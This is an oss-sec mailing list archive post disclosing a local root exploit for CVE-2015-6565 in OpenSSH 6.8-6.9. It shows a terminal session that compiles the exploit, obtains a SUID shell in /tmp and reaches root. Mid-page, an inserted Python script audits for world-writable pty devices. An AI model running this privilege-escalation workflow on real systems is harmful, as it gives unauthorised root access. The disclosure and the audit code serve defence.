oss-sec mailing list archives
Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux
From: up201407890 () alunos dcc fc up pt
Date: Thu, 26 Jan 2017 10:07:24 +0100
Hi list, I know I'm late to the party, but I was bored, so I decided to write an exploit for CVE-2015-6565, which affects OpenSSH 6.8-6.9. It is mostly considered to be a "DoS", even though Jann Horn publicly told how it could be exploited for local privilege escalation, but I guess it's either PoC||GTFO for users to update.
From https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6565:

"sshd in OpenSSH 6.8 and 6.9 uses world-writable permissions for TTY devices, which allows local users to cause a denial of service (terminal disruption) or possibly have unspecified other impact by writing to a device, as demonstrated by writing an escape sequence."
I think the description should be updated.

$ gcc not_an_sshnuke.c -o not_an_sshnuke
$ ./not_an_sshnuke /dev/pts/3
[*] Waiting for slave device /dev/pts/3
[+] Got PTY slave /dev/pts/3
[+] Making PTY slave the controlling terminal
[+] SUID shell at /tmp/sh
$ /tmp/sh --norc --noprofile -p
# id
euid=0(root) groups=0(root)

Thanks,
Federico Bento.
Attachment: not_an_sshnuke.c
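The post above turns on pty slave devices that sshd left world-writable. As an added defender-side check, not code from the post, its attachment, or the OpenSSH project, the script below lists pty slaves under /dev/pts whose mode grants write access to "other"; the /dev/pts path, the numeric-name convention for slaves and the 0620 reference mode are assumptions about a typical Linux system.

```python
"""Audit pty slave devices for world-writable permissions.

Context: CVE-2015-6565 (OpenSSH 6.8-6.9) left sshd-allocated pty slaves
world-writable instead of the usual 0620 root:tty. This is an added
helper, not part of the original post or of OpenSSH; the paths and
the expected mode below are assumptions for a typical Linux system.
"""
import os
import stat
from typing import List

# Assumed normal mode for a pty slave on Linux: rw for the owner,
# w for group "tty" (so write(1)/wall can reach it), nothing for others.
EXPECTED_PTY_MODE = 0o620


def is_world_writable(mode: int) -> bool:
    """True if the 'other' write bit is set in the given st_mode."""
    return bool(mode & stat.S_IWOTH)


def insecure_pty_devices(pts_dir: str = "/dev/pts") -> List[str]:
    """Return the paths under pts_dir that are world-writable.

    Only numeric entries are examined (the pty slaves); /dev/pts/ptmx is
    skipped. A missing directory yields an empty list, and entries that
    disappear between listing and stat() (sessions closing) are ignored.
    """
    findings: List[str] = []
    try:
        names = os.listdir(pts_dir)
    except FileNotFoundError:
        return findings
    for name in sorted(names, key=lambda n: int(n) if n.isdigit() else -1):
        if not name.isdigit():
            continue
        path = os.path.join(pts_dir, name)
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        if is_world_writable(st.st_mode):
            findings.append(path)
    return findings


if __name__ == "__main__":
    for p in insecure_pty_devices():
        print("world-writable pty slave:", p)
```

On an unaffected system the scan prints nothing; any hit is a pty whose owner session can be written to by every local user.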
Current thread:
- Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux up201407890 (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Noryungi (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux up201407890 (Jan 26)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Sebastian Krahmer (Jan 31)
- Re: Re: OpenSSH: CVE-2015-6565 (pty issue in 6.8-6.9) can lead to local privesc on Linux Noryungi (Jan 26)